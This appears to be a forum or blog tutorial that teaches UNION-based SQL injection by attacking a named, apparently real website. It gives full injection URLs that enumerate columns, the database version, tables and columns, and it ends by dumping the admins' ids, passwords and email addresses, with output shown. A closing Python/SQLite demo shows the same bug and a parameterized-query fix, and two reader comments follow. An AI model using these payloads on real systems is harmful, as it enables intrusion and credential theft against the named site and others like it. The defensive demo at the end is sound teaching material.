Best SQL hacking tutorials I have ever read for noobs or newbies.
Hope you find it useful.
I am not responsible for any misuse of this document.
This website shown is legit vulnerable; I am not advising you to hack it, but I'm making you aware the website exists and is vulnerable to this.
Code:
http://www.swidwin.mns.pl/news.php?id=-17'
Add ' to the end of the URL to check if it's vulnerable.
It gives an error, so I know it's vulnerable; I remove the ' and do
Code:
http://www.swidwin.mns.pl/news.php?id=17 order by 1--
Code:
http://www.swidwin.mns.pl/news.php?id=17 order by 2--
Code:
http://www.swidwin.mns.pl/news.php?id=17 order by 3--
No errors, so I keep increasing the number.
I finally get an error when I do the one below:
Code:
http://www.swidwin.mns.pl/news.php?id=17 order by 13--
So this tells me column 13 doesn't exist, so the query must return 12 columns.
Next I do the UNION SELECT statement as shown below:
Code:
http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--
(Note: make sure to put a - in front of the 17, like =-17, in the ID, so the real news row returns nothing and the UNION row is what gets displayed.)
I hit enter.
Numbers 4 and 5 appear on the page; this means columns 4 and 5 are displayed, so data can be extracted through them.
I replace the 4 in the URL with @@version so it now looks like
Code:
http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12--
Then I hit enter and see:
5.0.32-Debian_7etch8-log
^ This is the MySQL version running. It's running version 5, which helps a lot (on version 4 and below you have to guess the table names).
Now, where we put @@version (the 4th spot), replace it with
group_concat(table_name) << gets the table names
like
Code:
http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12--
And at the end of the union select string remove the -- after the 12 and add
+from+information_schema.tables+where+table_schema=database()--
So it now looks like
Code:
http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()--
I now see:
x_admins,x_articles,x_ban,x_banners,x_banners_info,x_comments,x_file_categories,x_file_data,x_forum_a,x_forum_b,x_forum_c,x_gbook,x_infopages,x_links_categories,x_links_data,x_mails,x_menu,x_news,x_poll_data,x_poll_desc,x_pw,x_topic,x_users
Now replace group_concat(table_name) with group_concat(column_name), and replace everything after 5,6,7,8,9,10,11,12 with
+from+information_schema.columns+where+table_name='x_admins'--
so it goes from
Code:
http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()--
TO
Code:
http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12 +from+information_schema.columns+where+table_name='x_admins'--
We see: id,nick,pass,name,added,access,mail,stat
It's worth learning about grouping at this point, but for now we put
group_concat(id,0x3a,pass,0x3a,mail) where group_concat(column_name) was (0x3a is a colon, used as a separator between the values) and add +from+x_admins-- after 10,11,12.
So the string becomes
Code:
http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(id,0x3a,pass,0x3a,mail),5,6,7,8,9,10,11,12 +from+x_admins--
At this point we obtain the admin's id, password and mail address.
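To show the defender's side of what the post walks through, here is an added example (my own, not code from the post or from the site it mentions) that reproduces the news.php?id= bug in a small SQLite script beside the parameterized query that closes it. The x_admins table and column names follow the post; the news table layout, the sample rows and the three-column payload are constructed for the demo.

```python
import sqlite3

# Constructed sample data standing in for the site's news and x_admins tables
# (values are made up; only the x_admins table and column names follow the post).
NEWS = [(17, "Hello", "World"), (18, "Second", "Item")]
ADMINS = [(1, "admin", "s3cret", "admin@example.invalid"),
          (2, "editor", "hunter2", "editor@example.invalid")]


def make_db():
    """In-memory SQLite database holding the two tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE x_admins (id INTEGER, nick TEXT, pass TEXT, mail TEXT)")
    conn.executemany("INSERT INTO news VALUES (?,?,?)", NEWS)
    conn.executemany("INSERT INTO x_admins VALUES (?,?,?,?)", ADMINS)
    return conn


def get_news_vulnerable(conn, raw_id):
    """The bug behind news.php?id=: the parameter is spliced straight into SQL."""
    return conn.execute(f"SELECT id, title, body FROM news WHERE id={raw_id}").fetchall()


def get_news_safe(conn, raw_id):
    """Fix: validate the type, then bind the value so it can never become SQL."""
    try:
        news_id = int(raw_id)
    except (TypeError, ValueError):
        return []  # reject anything that is not a plain integer id
    return conn.execute("SELECT id, title, body FROM news WHERE id=?", (news_id,)).fetchall()


# Same shape as the post's final URL, cut down to this demo's three columns:
# a negative id empties the real result, and the UNION row is what gets shown.
PAYLOAD = "-17 UNION SELECT 1,2,group_concat(nick||':'||pass) FROM x_admins--"


def compare():
    """Run the same input through both versions and return what each gives back."""
    conn = make_db()
    return {
        "vulnerable": get_news_vulnerable(conn, PAYLOAD),  # leaks x_admins
        "safe": get_news_safe(conn, PAYLOAD),              # [] (input rejected)
        "safe_normal": get_news_safe(conn, "17"),          # the real news row
    }


if __name__ == "__main__":
    for name, rows in compare().items():
        print(f"{name}: {rows}")
```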
2 Responses
Very informative article
How do you remember all this stuff? You're blinding us with science.